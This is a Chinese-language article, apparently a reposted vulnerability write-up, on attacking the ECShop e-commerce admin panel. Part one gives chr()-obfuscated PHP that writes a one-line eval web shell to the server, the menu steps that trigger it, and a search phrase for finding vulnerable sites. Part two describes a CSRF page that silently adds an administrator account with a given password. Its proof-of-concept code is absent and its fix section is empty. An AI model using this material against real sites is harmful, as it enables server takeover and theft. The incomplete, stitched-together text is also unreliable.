ecshop后台获取shell方法，通杀版本&后台低权限网站安全

ecshop后台获取shell方法，通杀版本&后台低权限网站安全（通用2篇）

篇1：ecshop后台获取shell方法，通杀版本&后台低权限网站安全

后台可以提交构造代码绕过过滤,成功解析生成一句话木马.

$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);

$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);

$a=chr(119);

$fp=@fopen($filen,$a);

$msg=@fwrite($fp,$filec);

if($msg) echo chr(79).chr(75).chr(33);

@fclose($fp);

?>

后台-订单管理-订单打印-选择源代码编辑-保存

返回订单列表，随意选择一个订单打印，返回OK，生成一句话成功!

丢个关键字:Powered by ECShop

篇2：ecshop后台获取shell方法，通杀版本&后台低权限网站安全

所以，做好一个自动提交表单，且载入与一个隐藏的框架中，给管理员访问，管理员就中招了有木有!!!

POC:

代表乌云消灭你 Ecshop Csrf获取管理员权限测试 By VIP

给管理员访问这个页面后，页面没有变化，但是后台其实已经增加了一个用户名wooyun 邮箱root@wooyun.org 密码wooyuntest123的管理员 有木有!!!

修复方案：